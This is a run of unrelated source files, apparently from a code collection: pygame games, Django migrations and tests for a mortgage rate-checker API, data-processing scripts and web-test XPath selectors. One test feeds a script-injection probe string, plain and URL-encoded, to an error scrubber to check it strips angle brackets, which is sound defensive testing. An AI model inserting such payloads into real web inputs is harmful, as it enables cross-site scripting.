    """An oncoming car that scrolls down the screen and respawns above it."""

    def __init__(self, nr):
        pygame.sprite.Sprite.__init__(self)
        # Load the numbered car image, flip it to face downward, and resize.
        car_img = pygame.image.load(path.join(img_dir, 'Car_{0}.png'.format(nr))).convert_alpha()
        car_img = pygame.transform.flip(car_img, False, True)
        self.image = pygame.transform.scale(car_img, (car_width, car_height))
        self.rect = self.image.get_rect()
        self._respawn()

    def _respawn(self):
        """Place the car at a random x on the road, above the visible screen."""
        self.rect.x = random.randrange(display_width * 0.25 - self.rect.width / 2,
                                       display_width * 0.75 - self.rect.width / 2)
        self.rect.y = random.randrange(-1200, -100)
        self.speedy = 6

    def update(self):
        self.rect.y += self.speedy
        # Once fully below the screen, wrap back around to the top.
        if self.rect.top > display_height + 45:
            self._respawn()
class Road(pygame.sprite.Sprite):
    """The gray road surface, 60% of the screen width, centred horizontally."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.Surface((display_width * 0.6, display_height))
        self.image.fill(gray)
        self.rect = self.image.get_rect()
        self.rect.centerx = display_width / 2
        self.rect.bottom = display_height
class Roadside(pygame.sprite.Sprite):
    """The beige shoulder strip, slightly wider than the road (drawn beneath it)."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.Surface((display_width * 0.7, display_height))
        self.image.fill(beige)
        self.rect = self.image.get_rect()
        self.rect.centerx = display_width / 2
        self.rect.bottom = display_height
class Roadpaint(pygame.sprite.Sprite):
    """A single white lane-marking dash that scrolls down and removes itself."""
    def __init__(self, xloc):
        pygame.sprite.Sprite.__init__(self)
        # 5x30-pixel white dash centred on the given lane column.
        self.image = pygame.Surface((5, 30))
        self.image.fill(white)
        self.rect = self.image.get_rect()
        self.rect.centerx = xloc
        # Spawn above the visible screen and scroll downward.
        self.rect.y = -100
        self.speedy = 3
    def update(self):
        self.rect.y += self.speedy
        # Remove the dash once it has scrolled off the bottom.
        if self.rect.top > display_height:
            self.kill()
# Definitions
def time_passed(count):
    """Blit the elapsed-time counter in the top-left corner of the display."""
    hud_font = pygame.font.SysFont(None, 25)
    label = hud_font.render("Time passed: " + str(count), True, black)
    gameDisplay.blit(label, (0, 0))
def distance(cord_x, cord_y, text_loc_y, object):
    """Blit "<object>: (x, y)" at vertical offset *text_loc_y* on the left edge."""
    # NOTE(review): the parameter name `object` shadows the builtin of the
    # same name; harmless here but worth renaming.
    font = pygame.font.SysFont(None, 25)
    text = font.render(str(object) + ": (" + str(cord_x) + ", " + str(cord_y) + ")", True, black)
    gameDisplay.blit(text, (0, text_loc_y))
def text_objects(text, font):
    """Render *text* in black with *font*; return (surface, bounding rect)."""
    rendered = font.render(text, True, black)
    return rendered, rendered.get_rect()
font_name = pygame.font.match_font('arial')
def draw_text(surf, text, size, placement_x, placement_y):
    """Render *text* at the given size and blit it with its top edge centred
    on (placement_x, placement_y)."""
    rendered = pygame.font.Font(font_name, size).render(text, True, black)
    bounds = rendered.get_rect()
    bounds.midtop = (placement_x, placement_y)
    surf.blit(rendered, bounds)
def show_go_screen():
    """Show the title screen and wait for a key release to start the game."""
    gameDisplay.fill(white)
    draw_text(gameDisplay, 'Ghost Driver', 64, display_width / 2, display_height / 4)
    draw_text(gameDisplay, 'Arrow keys to move', 32, display_width / 2, display_height / 2)
    draw_text(gameDisplay, 'Press any key to start', 24, display_width / 2, display_height * 3 / 4)
    pygame.display.flip()
    waiting = True
    while waiting:
        clock.tick(60)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                # Fixed: previously only pygame.quit() was called and the loop
                # kept polling a shut-down pygame, which raises on the next
                # event.get().  Exit the program too, as game_loop does.
                pygame.quit()
                quit()
            if event.type == pygame.KEYUP:
                waiting = False
def game_loop():
    """Main loop: show the title screen, then drive until the player crashes."""
    gameExit = False
    gameOver = True   # start on the title screen
    n_objects = 7     # number of oncoming cars on the road
    # game will run so long as gameExit is False
    while not gameExit:
        # cap the frame rate
        clock.tick(80)
        if gameOver:
            # (Re)start: show the title screen and rebuild all game state.
            show_go_screen()
            gameOver = False
            startTime = time.time()
            all_sprites = pygame.sprite.Group()
            road_sprites = pygame.sprite.Group()
            road_paint_sprites = pygame.sprite.Group()
            blocks = pygame.sprite.Group()
            player = Player()
            road = Road()
            roadside = Roadside()
            road_sprites.add(roadside)
            road_sprites.add(road)
            all_sprites.add(player)
            # Spawn the oncoming cars with random sprites and positions.
            for i in range(1, n_objects + 1):
                m = Object(nr=random.randrange(1, 6))
                # overlap = pygame.sprite.spritecollide(m, blocks, False, pygame.sprite.collide_mask)
                all_sprites.add(m)
                blocks.add(m)
                # draw_text(gameDisplay, 'No overlap', 32, display_width / 2, display_height / 2)
        timePassed = round((time.time() - startTime), 1)
        # spawns a row of lane markings on whole-second ticks
        if timePassed % 1 == 0:
            for i in range(0, 5):
                r = Roadpaint(xloc=rdpaint[i])
                road_paint_sprites.add(r)
        ## EVENTS ##
        # gets all events happening in the game: cursor movements, key clicks etc.
        for event in pygame.event.get():
            # if the user clicks the window close button, shut down and exit
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        ## UPDATE GAME STATE ##
        # update all_sprites group
        all_sprites.update()
        road_paint_sprites.update()
        # TODO: If objects collide then kill() them
        # TODO: Change car speed when in ditch
        # TODO: Add new objects to ditch
        # pixel-perfect collision detection between the player and any car
        hits = pygame.sprite.spritecollide(player, blocks, False, pygame.sprite.collide_mask)
        # hits = pygame.sprite.collide_mask(player, object)
        if hits:
            gameOver = True
            timePassed = round((time.time() - startTime), 4)
        ## RENDER ###
        # background color of game
        gameDisplay.fill(green)
        # pygame.draw.rect(gameDisplay, white, [display_width/2, display_height/2, 50, 50])
        # sprites
        road_sprites.draw(gameDisplay)
        # road_paint_sprites.draw(gameDisplay)
        all_sprites.draw(gameDisplay)
        # HUD: elapsed time
        time_passed(timePassed)
        # HUD: coordinates of each oncoming car
        list_blocks = blocks.sprites()
        # y_dist = player.rect.top - list_blocks[1].rect.bottom
        # x_dist = player.rect.center[0] - list_blocks[1].rect.center[0]
        for i in range(0, n_objects):
            y_dist = list_blocks[i].rect.center[1]
            x_dist = list_blocks[i].rect.center[0]
            down = 25 * (i + 1)
            distance(x_dist, y_dist, down, "Car " + str(i + 1))
        # update display after events
        pygame.display.flip()
# Run the game; control only returns here once the loop exits.
game_loop()
# stop pygame
pygame.quit()
# stop the .py program
quit()
|
998,350 | 4179f2db4e5cc4f0024365344e466e183e0e0f79 | import sqlite3
conn = sqlite3.connect('../sensorData.db')
c = conn.cursor()
def main():
    """Placeholder for creating the sigfoxInfo table (work in progress)."""
    dbPath = '../sensorData.db'
    # NOTE(review): this CREATE TABLE statement has no column definitions
    # (invalid SQL as written) and is never executed against the module-level
    # connection — presumably unfinished; confirm the intended schema.
    sql_create_sigfox_info_table = """ CREATE TABLE IF NOT EXISTS sigfoxInfo(
)
"""
if __name__ == '__main__':
main()
|
998,351 | 0703ed422004b3bb5a9758521526aa8692ce9dd2 | # Generated by Django 3.2.3 on 2021-07-13 09:46
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the `menace` table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='menace',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('type', models.CharField(max_length=50, null=True)),
                ('reference', models.CharField(max_length=50, null=True)),
                ('description', models.CharField(max_length=50, null=True)),
                ('access', models.CharField(max_length=50, null=True)),
                ('acteur', models.CharField(max_length=50, null=True)),
                ('motivation', models.CharField(max_length=50, null=True)),
                ('resultat', models.CharField(max_length=50, null=True)),
                # Managed timestamps: set on insert / on every save respectively.
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
|
998,352 | 1cd1ed3f0731c7b223d58b8320243b2365ff599c | import cv2
from PIL import Image
import matplotlib.pyplot as plt
import h5py
# img = Image.open(
# 'C:\\Users\\PC\\Downloads\\test_Conv\\Convolutional Models\\DatasetCreation\\data_sneakers\\Nike\\Nike Air Bakin_ Posite _ Men_s.png')
# img = cv2.imdecode(img,-1)
# plt.imshow(img)
# plt.show()
# xxx = cv2.cvtColor(cv2.UMat(img), cv2.COLOR_RGBA2BGR)
# plt.imshow(xxx)
# plt.show()
# ii = cv2.imread("C:\\Users\\PC\\Downloads\\test_Conv\\Convolutional Models\\DatasetCreation\\data_sneakers\\Nike\\Nike Air Bakin_ Posite _ Men_s.png")
# gray_image = cv2.cvtColor(ii, cv2.COLOR_RGBA2BGR)
# print(gray_image.shape)
# plt.imshow(gray_image)
# plt.show()
OUTPUT_PATH = 'C:\\Users\\PC\\Downloads\\test_Conv\\Convolutional Models\\DatasetCreation\\data_shoes\\'
ftrain = h5py.File(OUTPUT_PATH + 'train_dataset.h5', 'r')
ftest = h5py.File(OUTPUT_PATH + 'test_dataset.h5', 'r')
# Split the dataset into training and evaluation data with their labels.
# NOTE(review): the assignment looks swapped — `train_*` is read from the
# TEST file and `eval_*` from the TRAIN file. Confirm whether this is
# intentional before relying on the variable names.
train_data, train_labels = ftest['test_set_x'], ftest['test_set_y']
eval_data, eval_labels = ftrain['train_set_x'], ftrain['train_set_y']
# Spot-check two sample images from each split.
plt.imshow(train_data[4])
plt.show()
plt.imshow(eval_data[21])
plt.show()
|
998,353 | 371e94a0ca7389491dfcb812434f1ff1bfb6513e | import pandas as pd
from openpyxl import load_workbook
import pandas.io.formats.excel
from Creditos_Asignados_Por_Semestre import obtenerListas,agrega_Columna
import numpy as np
import xlrd
# Data loaded into memory from the graduates workbook.
codigos_todas_materias_graduados = []
codigos_materias_por_semestre = []
estado_materias = []
nombre = "../Excel_generados/graduados.xlsx"
openfile = xlrd.open_workbook(nombre)
hoja_materias_por_semestre= openfile.sheet_by_name("materias_graduados")
hoja_todas_materias_graduados = openfile.sheet_by_name("listamaterias_graduados2")
# Column 2 of the master sheet: one code per distinct course.
lista_valores =[codigos_todas_materias_graduados]
lista_indices =[2]
lista_tipos=[str]
obtenerListas(hoja_todas_materias_graduados,lista_valores,lista_indices,lista_tipos)
# Columns 6 and 3 of the per-semester sheet: course code and its state.
lista_valores =[codigos_materias_por_semestre,estado_materias]
lista_indices =[6,3]
lista_tipos=[str,str]
obtenerListas(hoja_materias_por_semestre,lista_valores,lista_indices,lista_tipos)
# Per-course tallies, indexed like codigos_todas_materias_graduados.
reprobados = np.zeros(len(codigos_todas_materias_graduados))
aprobados = np.zeros(len(codigos_todas_materias_graduados))
por_faltas = np.zeros(len(codigos_todas_materias_graduados))
for m in range(len(codigos_todas_materias_graduados)):
    for x in range(len(codigos_materias_por_semestre)):
        if codigos_todas_materias_graduados[m] == codigos_materias_por_semestre[x]:
            # 'RP' = failed, 'AP' = passed; every other state is counted as
            # failed-by-absences (presumably — confirm against the data).
            if estado_materias[x]== 'RP':
                reprobados[m]+= 1
            elif estado_materias[x]== 'AP':
                aprobados[m]+=1
            else:
                por_faltas[m]+=1
diccionario = {"aprobados":aprobados,"reprobados":reprobados,"reprobados_por_faltas":por_faltas}
agrega_Columna(nombre,"listamaterias_graduados2",diccionario,4)
# Sanity check: every per-semester record was classified exactly once.
vale = len(codigos_materias_por_semestre)
print(aprobados.sum() +por_faltas.sum()+ reprobados.sum() == vale)
998,354 | d658f703d9edae127b01e3a29e7e383fae38cbca | from decimal import Decimal
from django.test import TestCase
from ratechecker.models import Product
from ratechecker.ratechecker_parameters import ParamsSerializer, scrub_error
class RateCheckerParametersTestCase(TestCase):
    """Validation tests for ParamsSerializer and the scrub_error helper.

    Each test mutates a copy of a known-good payload (see setUp) and checks
    either the validation errors or the normalised validated_data.
    """

    def setUp(self):
        # Baseline payload that passes validation unchanged.
        self.data = {
            "price": 240000,
            "loan_amount": 200000,
            "state": "GA",
            "loan_type": "JUMBO",
            "minfico": 700,
            "maxfico": 800,
            "rate_structure": "FIXED",
            "loan_term": 30,
        }

    def test_is_valid__no_args(self):
        # All seven required fields must be reported when the payload is empty.
        serializer = ParamsSerializer(data={})
        self.assertFalse(serializer.is_valid())
        self.assertEqual(len(serializer.errors), 7)
        self.assertEqual(
            serializer.errors.get("loan_amount"), ["This field is required."]
        )
        self.assertEqual(
            serializer.errors.get("state"), ["This field is required."]
        )
        self.assertEqual(
            serializer.errors.get("loan_type"), ["This field is required."]
        )
        self.assertEqual(
            serializer.errors.get("minfico"), ["This field is required."]
        )
        self.assertEqual(
            serializer.errors.get("maxfico"), ["This field is required."]
        )
        self.assertEqual(
            serializer.errors.get("rate_structure"),
            ["This field is required."],
        )
        self.assertEqual(
            serializer.errors.get("loan_term"), ["This field is required."]
        )

    def test_is_valid__valid_args(self):
        # The baseline payload validates and numbers become Decimals/ints.
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("price"), Decimal("240000")
        )
        self.assertEqual(
            serializer.validated_data.get("loan_amount"), Decimal("200000")
        )
        self.assertEqual(serializer.validated_data.get("state"), "GA")
        self.assertEqual(serializer.validated_data.get("loan_type"), "JUMBO")
        self.assertEqual(serializer.validated_data.get("minfico"), 700)
        self.assertEqual(serializer.validated_data.get("maxfico"), 800)
        self.assertEqual(
            serializer.validated_data.get("rate_structure"), "FIXED"
        )
        self.assertEqual(serializer.validated_data.get("loan_term"), 30)

    def test_is_valid__invalid_lock(self):
        self.data["lock"] = 20
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("lock"), ["lock needs to be 30, 45, or 60."]
        )

    def test_is_valid__lock_default(self):
        # Omitting lock fills in the serializer default and its min/max range.
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("lock"), ParamsSerializer.LOCK
        )
        self.assertEqual(serializer.validated_data.get("min_lock"), 46)
        self.assertEqual(serializer.validated_data.get("max_lock"), 60)

    def test_is_valid__lock_non_default(self):
        self.data["lock"] = 30
        self.data["min_lock"] = 0
        self.data["max_lock"] = 30
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(serializer.validated_data.get("lock"), 30)
        self.assertEqual(serializer.validated_data.get("min_lock"), 0)
        self.assertEqual(serializer.validated_data.get("max_lock"), 30)

    def test_is_valid__points_default(self):
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("points"), ParamsSerializer.POINTS
        )

    def test_is_valid__points_non_default(self):
        self.data["points"] = 4
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(serializer.validated_data.get("points"), 4)

    def test_is_valid__property_type_default(self):
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("property_type"),
            ParamsSerializer.PROPERTY_TYPE,
        )

    def test_is_valid__property_type_non_default(self):
        self.data["property_type"] = ParamsSerializer.PROPERTY_TYPE_COOP
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("property_type"),
            ParamsSerializer.PROPERTY_TYPE_COOP,
        )

    def test_is_valid__property_type_invalid(self):
        self.data["property_type"] = "A"
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("property_type"),
            ['"A" is not a valid choice.'],
        )

    def test_is_valid__loan_purpose_default(self):
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("loan_purpose"),
            ParamsSerializer.LOAN_PURPOSE,
        )

    def test_is_valid__loan_purpose_non_default(self):
        self.data["loan_purpose"] = Product.REFI
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("loan_purpose"), Product.REFI
        )

    def test_is_valid__loan_purpose_invalid(self):
        self.data["loan_purpose"] = "A"
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("loan_purpose"),
            ['"A" is not a valid choice.'],
        )

    def test_is_valid__io_default(self):
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("io"), ParamsSerializer.IO
        )

    def test_is_valid__io_non_default(self):
        self.data["io"] = 1
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(serializer.validated_data.get("io"), 1)

    def test_is_valid__io_invalid(self):
        self.data["io"] = 4
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("io"), ["io needs to be 0 or 1."]
        )

    def test_is_valid__loan_amount_none(self):
        self.data["loan_amount"] = None
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("loan_amount"),
            ["This field may not be null."],
        )

    def test_is_valid__loan_amount_empty(self):
        self.data["loan_amount"] = ""
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("loan_amount"),
            ["A valid number is required."],
        )

    def test_is_valid__loan_amount_negative(self):
        # Negative amounts are normalised to their absolute value.
        self.data["loan_amount"] = -10000
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("loan_amount"), Decimal("10000")
        )

    def test_is_valid__price(self):
        self.data["price"] = 1000
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(serializer.validated_data["price"], Decimal("1000"))

    def test_is_valid__price_negative(self):
        # Negative prices are normalised to their absolute value.
        self.data["price"] = -10000
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(
            serializer.validated_data.get("price"), Decimal("10000")
        )

    def test_is_valid__price_zero(self):
        # A zero price is coerced to 1 (avoids division by zero in LTV).
        self.data["price"] = 0
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(serializer.validated_data["price"], Decimal("1"))

    def test_is_valid__state_invalid(self):
        self.data["state"] = 123
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("state"), ['"123" is not a valid choice.']
        )

    def test_is_valid__loan_type_invalid(self):
        self.data["loan_type"] = "A"
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("loan_type"), ['"A" is not a valid choice.']
        )

    def test_is_valid__maxfico_smaller(self):
        # min/max FICO are swapped into ascending order when reversed.
        self.data["maxfico"] = 600
        self.data["minfico"] = 700
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(serializer.validated_data.get("maxfico"), 700)
        self.assertEqual(serializer.validated_data.get("minfico"), 600)

    def test_is_valid__ficos_negative(self):
        # Negative FICO values are normalised to absolute values, then ordered.
        self.data["maxfico"] = -100
        self.data["minfico"] = -200
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(serializer.validated_data.get("maxfico"), 200)
        self.assertEqual(serializer.validated_data.get("minfico"), 100)

    def test_is_valid__rate_structure_arm_no_arm_type(self):
        self.data["rate_structure"] = "ARM"
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("non_field_errors"),
            ["arm_type is required if rate_structure is ARM."],
        )

    def test_is_valid__loan_term_not_choice(self):
        self.data["loan_term"] = 20
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())
        self.assertEqual(
            serializer.errors.get("loan_term"),
            ["loan_term needs to be 15 or 30."],
        )

    def test_is_valid__loan_term_negative(self):
        self.data["loan_term"] = -30
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(serializer.data.get("loan_term"), 30)

    def test_is_valid__ltv__without_ltv(self):
        # LTV is derived from loan_amount / price when not given explicitly.
        self.data["price"] = 200000
        self.data["loan_amount"] = 180000
        serializer = ParamsSerializer(data=self.data)
        self.assertTrue(serializer.is_valid())
        self.assertEqual(serializer.validated_data.get("min_ltv"), 90)
        self.assertTrue(
            serializer.validated_data.get("min_ltv"),
            serializer.validated_data.get("max_ltv"),
        )

    def test_is_valid__ltv__without_price(self):
        data = dict(self.data)
        data["ltv"] = 90
        data.pop("price", None)
        serializer = ParamsSerializer(data=data)
        self.assertTrue(serializer.is_valid())

    def test_is_valid_only_price_or_ltv_not_both(self):
        self.data["price"] = 200000
        self.data["loan_amount"] = 180000
        self.data["ltv"] = 90.100
        serializer = ParamsSerializer(data=self.data)
        self.assertFalse(serializer.is_valid())

    def test_is_valid_no_price_or_ltv(self):
        data = dict(self.data)
        data.pop("price", None)
        data.pop("ltv", None)
        serializer = ParamsSerializer(data=data)
        self.assertFalse(serializer.is_valid())
        self.assertIn(
            "one of price or ltv is required",
            serializer.errors["non_field_errors"],
        )

    def test_error_scrubber(self):
        # scrub_error must strip angle brackets in both raw and URL-encoded form.
        bad_value1 = "CONFFQ684<SCRIPT>ALERT(1)</SCRIPT>"
        bad_value2 = r"%3Cscript%3CEalert(1)%3C%2fscript%3E"
        for char in ["<", ">", r"%3C", r"%3E"]:
            self.assertNotIn(char, scrub_error(bad_value1))
            self.assertNotIn(char, scrub_error(bad_value2))

    def test_error_scrubber_called_without_is_valid_raises_error(self):
        # DRF forbids reading .errors before .is_valid() has been called.
        serializer = ParamsSerializer(data=self.data)
        with self.assertRaises(AssertionError):
            serializer.errors
|
998,355 | baea307ab62477253d28a03e6188c375657ea493 | from django.conf.urls import url
from Test import views
urlpatterns = [
    # List endpoint for snippets.
    url(r'^snippets/$', views.snippet_list),
    # Detail route kept for reference; note it lacks a trailing `$` anchor.
    #url(r'^snippets/', views.snippet_detail),
]
998,356 | 537903f2eefce52a87dfbae7ca46ee8ae6a7170a | import astropy.io.fits as fits
import utils.prologue as prologue
from scipy import ndimage
from matplotlib import pyplot as plt
import numpy as np
from utils.mosaic import *
import imageio as imgio
def main(args):
    """Convolve the input FITS image with a star cutout and save the result as PNG.

    @param args parsed CLI arguments; `args.i` is the input FITS file path.
    """
    # Alternative star candidates kept for reference:
    #x_star,y_star = 3274,7977
    #radius = 10
    x_star,y_star = 3069,7821
    radius = 15
    #x_star,y_star = 2585,7765
    #radius = 5
    data = fits.open(args.i)[0].data
    # Flip vertically, then rescale (scale_image comes from utils.mosaic).
    scaled_data = scale_image(data[::-1].copy())
    # Square cutout around the star, used as the convolution kernel.
    star = scaled_data[y_star-radius:y_star+radius, x_star-radius:x_star+radius]
    data_convolved = ndimage.convolve(scaled_data, star)
    imgio.imwrite('convolved_yx_wihtout_parameter.png', data_convolved)
if __name__ == '__main__':
main(prologue.get_args()) |
998,357 | fd5e848d4aed03a7ffcd7b5bd51e411973a7589d | # Charles Buyas cjb8qf
import random
print("Let's play Tic Tac Toe!\n")
def get_human():
    """Ask the player which letter to play; return [player_letter, computer_letter]."""
    choice = ''
    while choice not in ('X', 'O'):
        choice = input("Do you want to be X or O?: ").upper()
    return ['X', 'O'] if choice == 'X' else ['O', 'X']
def draw_board(board):
    """Print the 3x3 board; squares 7-9 are the top row, 1-3 the bottom."""
    # "board" is a list of 10 strings (index 0 unused).
    for row_start in (7, 4, 1):
        print(' ' + ' | '.join(board[row_start:row_start + 3]))
def first_move():
    """Ask who moves first; return "computer" or "player"."""
    answer = ''
    while answer not in ('P', 'C'):
        answer = str(input("Who goes first? (P or C): ")).upper()
    return 'computer' if answer == 'C' else 'player'
def empty_space(board, move):
    # Return True if square *move* is still unclaimed on the board.
    return board[move] == ' '
def get_human_move(board):
    """Prompt until the player enters a digit 1-9 naming a free square; return it."""
    valid_squares = set(range(1, 10))
    while True:
        entry = input("What is your next move? (1-9): ")
        try:
            move = int(entry)
        except ValueError:
            # Previously non-numeric input crashed with an uncaught
            # ValueError from int(); now we simply re-prompt.
            continue
        if move in valid_squares and empty_space(board, move):
            return move
def check_winner(board, letter):
    """Return True if *letter* occupies any of the eight winning lines."""
    winning_lines = (
        (7, 8, 9), (4, 5, 6), (1, 2, 3),   # rows: top, middle, bottom
        (7, 4, 1), (8, 5, 2), (9, 6, 3),   # columns: left, middle, right
        (7, 5, 3), (9, 5, 1),              # the two diagonals
    )
    return any(
        all(board[square] == letter for square in line)
        for line in winning_lines
    )
def get_board_copy(board):
    """Return a shallow copy of *board* (slice copy replaces the manual append loop)."""
    return board[:]
def move_list(board, moves):
    """Return a random free square among *moves*, or None if all are taken."""
    open_squares = [square for square in moves if empty_space(board, square)]
    return random.choice(open_squares) if open_squares else None
def existing_move(board, letter, move):
    # Claim square *move* for *letter* (mutates *board* in place).
    board[move] = letter
def computer_move(board, computer_letter):
    """Choose the computer's square: win > block > center-vs-corner > corner > center > side."""
    player_letter = 'O' if computer_letter == 'X' else 'X'
    # Win this turn if any square completes a line for the computer.
    for i in range(1, 10):
        copy = get_board_copy(board)
        if empty_space(copy, i):
            existing_move(copy, computer_letter, i)
            if check_winner(copy, computer_letter):
                return i
    # Block the player if they could win on their next move.
    for i in range(1, 10):
        copy = get_board_copy(board)
        if empty_space(copy, i):
            existing_move(copy, player_letter, i)
            if check_winner(copy, player_letter):
                return i
    # Play the center if the player holds a corner.
    # Fixed: the old code did `move_list(board, corners) == True`, which
    # compared a square number (or None) to True and only matched when the
    # randomly chosen free corner happened to be 1, since 1 == True.
    if any(board[i] == player_letter for i in (1, 3, 7, 9)):
        if empty_space(board, 5):
            return 5
    # Try to take one of the corners, if they are free.
    move = move_list(board, [1, 3, 7, 9])
    if move is not None:
        return move
    # Try to take the center, if it is free.
    if empty_space(board, 5):
        return 5
    # Move on one of the sides.
    return move_list(board, [2, 4, 6, 8])
def full_board(board):
    """Return True when squares 1-9 have all been claimed, else False."""
    return all(square != ' ' for square in board[1:10])
# Single round of play: set up a fresh board, then alternate player and
# computer turns until someone wins or the board fills up.
game_is_playing = True
if game_is_playing:
    # Reset the board (index 0 is unused; squares are 1-9).
    new_board = [' '] * 10
    player_letter, computer_letter = get_human()
    turn = first_move()
    print('The ' + turn + ' will go first.')
while game_is_playing:
    if turn == "player":
        # player's turn
        draw_board(new_board)
        move = get_human_move(new_board)
        existing_move(new_board, player_letter, move)
        if check_winner(new_board, player_letter):
            draw_board(new_board)
            print('Hooray! You have won the game!')
            game_is_playing = False
        else:
            if full_board(new_board):
                draw_board(new_board)
                print('The game is a tie!')
                break
            else:
                turn = 'computer'
    else:
        # computer's turn
        move = computer_move(new_board, computer_letter)
        existing_move(new_board, computer_letter, move)
        if check_winner(new_board, computer_letter):
            draw_board(new_board)
            print('The computer has beaten you! You lose.')
            game_is_playing = False
        else:
            if full_board(new_board):
                draw_board(new_board)
                print('The game is a tie!')
                break
            else:
                turn = "player"
|
998,358 | 40abe6762c76e2764d0f35f31473f755e361e2f6 | #Letter Combinations of a Phone Number
import itertools
import sys
def letterCombinations(digits):
    """
    Return all letter strings spellable from a phone-keypad digit string.

    :type digits: str
    :rtype: List[str]

    Combinations come out in the same nested order as the manual loops did,
    e.g. '23' -> ['ad', 'ae', 'af', 'bd', ...].  An empty input, or any
    digit whose key carries no letters (0 or 1), yields [].
    """
    if digits == '':
        return []
    # Keypad letter groups, indexed by digit (0 and 1 have no letters).
    dstr = ['', '', 'abc', 'def', 'ghi', 'jkl', 'mno', 'pqrs', 'tuv', 'wxyz']
    groups = [dstr[int(d)] for d in digits]
    # itertools.product replaces the hand-rolled cartesian-product loops
    # (itertools was already imported but unused).
    return [''.join(combo) for combo in itertools.product(*groups)]
#print letterCombinations('2')
# NOTE: Python 2 print statement — under Python 3 this needs print(...).
print letterCombinations(sys.argv[1])
998,359 | 811fcdcc7930ec5266875a9b480419d56ee0a7ed | import objects.regulatorObjects as r
# Start the config thread first and busy-wait until configuration is loaded,
# then start every regulator thread and block until they all finish.
r.rConfig.start()
while r.config["filled"] is False:
    print("Loading Configurations")

# All regulator threads, in the same start order as before.
regulators = [
    r.rEc, r.rHumWater, r.rLight, r.rMist, r.rMold, r.rNutrition,
    r.rPH, r.rPHDown, r.rPHUp, r.rRootHum, r.rRootPres, r.rRootTemp,
    r.rShootHum, r.rShootPres, r.rShootTemp, r.rWaterLevel, r.rUpload,
]
for regulator in regulators:
    regulator.start()

r.rConfig.join()
for regulator in regulators:
    # Fixed: rRootTemp was started but its join() call was missing from the
    # hand-written join list; looping over the same list guarantees every
    # started thread is joined.
    regulator.join()
|
998,360 | 5420c44399b99494c4fd74b9851646fc0e50061f | #PC首页
monetate_icon="//*[@id='monetate_allinone_lightbox']//i[@class='iconfont icon-close']"
search_keyword = "//*[@class='search-box']//input[@name='keywords']"
search_submit ="//*[@class='search-box']//button[@type='submit']"
#搜索结果页
search_result_addbutton = "//*[@class='float_left items']//div[contains(text(),'加入购物车']"
search_result_item="//*[@class='float_left items']//*[@class='item-add_image']/a"
#商品详情页
pdp_scene = "//body"
item_addbutton = "//button[@class='action-add_cart float_left button-solid-yamired-active']"
item_addedText = "//*[@class='popup-modal_content fadeIn addcart-modal_wrapper']//*[@class='addcart-success_modal']/h3"
item_viewcart = "//*[@class='addcart-success_modal']//*[@class='button-view button-lightgray-active']"
#购物车
cart_scene= "//body"
cart_submit = "//*[@class='cart-checkout clearfix']/a"
#登录页
cus_email = "//*[@class='left-container float_left']//input[@type='text']"
cus_password ="//*[@class='left-container float_left']//input[@class='password-input']"
